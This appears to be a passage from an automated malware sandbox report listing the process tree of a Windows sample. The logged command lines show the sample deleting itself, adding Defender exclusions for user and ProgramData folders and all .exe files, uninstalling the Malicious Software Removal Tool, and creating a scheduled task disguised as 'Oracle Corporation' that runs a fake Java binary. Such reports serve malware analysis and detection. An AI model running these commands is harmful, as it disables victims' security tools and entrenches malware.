                                    Commandline:C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\sE5IdDeTp2.exe"
                                    Imagebase:0x7ff702490000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:13
                                    Start time:11:38:22
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:14
                                    Start time:11:38:22
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:15
                                    Start time:11:38:22
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\choice.exe
                                    Wow64 process (32bit):false
                                    Commandline:choice /C Y /N /D Y /T 3
                                    Imagebase:0x7ff787eb0000
                                    File size:35'840 bytes
                                    MD5 hash:1A9804F0C374283B094E9E55DC5EE128
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:16
                                    Start time:11:38:22
                                    Start date:12/01/2025
                                    Path:C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
                                    Imagebase:0x7ff6e3a60000
                                    File size:1'245'320 bytes
                                    MD5 hash:DD36F6F79E68D5E54C75527DB2DA97AD
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 37%, ReversingLabs
                                    Has exited:true

                                    Target ID:17
                                    Start time:11:38:23
                                    Start date:12/01/2025
                                    Path:C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
                                    Imagebase:0x7ff6e3a60000
                                    File size:1'245'320 bytes
                                    MD5 hash:DD36F6F79E68D5E54C75527DB2DA97AD
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:18
                                    Start time:11:38:23
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:19
                                    Start time:11:38:23
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:20
                                    Start time:11:38:26
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                    Imagebase:0x7ff702490000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:21
                                    Start time:11:38:26
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:22
                                    Start time:11:38:26
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:23
                                    Start time:11:38:26
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:24
                                    Start time:11:38:26
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\wusa.exe
                                    Wow64 process (32bit):false
                                    Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                    Imagebase:0x7ff765a80000
                                    File size:345'088 bytes
                                    MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:25
                                    Start time:11:38:26
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:27
                                    Start time:11:38:28
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:28
                                    Start time:11:38:28
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:31
                                    Start time:11:38:31
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:32
                                    Start time:11:38:31
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:33
                                    Start time:11:38:31
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:34
                                    Start time:11:38:31
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:35
                                    Start time:11:38:31
                                    Start date:12/01/2025
                                    Path:C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
                                    Imagebase:0x7ff75b4a0000
                                    File size:1'245'320 bytes
                                    MD5 hash:DD36F6F79E68D5E54C75527DB2DA97AD
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:36
                                    Start time:11:38:31
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:37
                                    Start time:11:38:32
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:38
                                    Start time:11:38:32
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:39
                                    Start time:11:38:32
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:40
                                    Start time:11:38:35
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                    Imagebase:0x7ff702490000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:41
                                    Start time:11:38:35
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:42
                                    Start time:11:38:35
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:43
                                    Start time:11:38:35
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:44
                                    Start time:11:38:35
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\wusa.exe
                                    Wow64 process (32bit):false
                                    Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                    Imagebase:0x7ff765a80000
                                    File size:345'088 bytes
                                    MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:45
                                    Start time:11:38:35
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:46
                                    Start time:11:38:35
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:47
                                    Start time:11:38:35
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:48
                                    Start time:11:38:35
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:49
                                    Start time:11:38:35
                                    Start date:12/01/2025
                                    Path:C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
                                    Imagebase:0x7ff6ecff0000
                                    File size:1'245'320 bytes
                                    MD5 hash:DD36F6F79E68D5E54C75527DB2DA97AD
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:50
                                    Start time:11:38:35
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:51
                                    Start time:11:38:35
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:52
                                    Start time:11:38:36
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:53
                                    Start time:11:38:36
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:54
                                    Start time:11:38:38
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:55
                                    Start time:11:38:38
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                    Imagebase:0x7ff702490000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:56
                                    Start time:11:38:38
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:57
                                    Start time:11:38:39
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:58
                                    Start time:11:38:39
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:59
                                    Start time:11:38:39
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\wusa.exe
                                    Wow64 process (32bit):false
                                    Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                    Imagebase:0x7ff765a80000
                                    File size:345'088 bytes
                                    MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:60
                                    Start time:11:38:39
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:61
                                    Start time:11:38:39
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:62
                                    Start time:11:38:39
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:63
                                    Start time:11:38:39
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:64
                                    Start time:11:38:39
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:65
                                    Start time:11:38:41
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:66
                                    Start time:11:38:41
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:67
                                    Start time:11:38:41
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:68
                                    Start time:11:38:41
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:69
                                    Start time:11:38:41
                                    Start date:12/01/2025
                                    Path:C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
                                    Imagebase:0x7ff71bd50000
                                    File size:1'245'320 bytes
                                    MD5 hash:DD36F6F79E68D5E54C75527DB2DA97AD
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:70
                                    Start time:11:38:41
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:71
                                    Start time:11:38:41
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:72
                                    Start time:11:38:41
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:73
                                    Start time:11:38:41
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
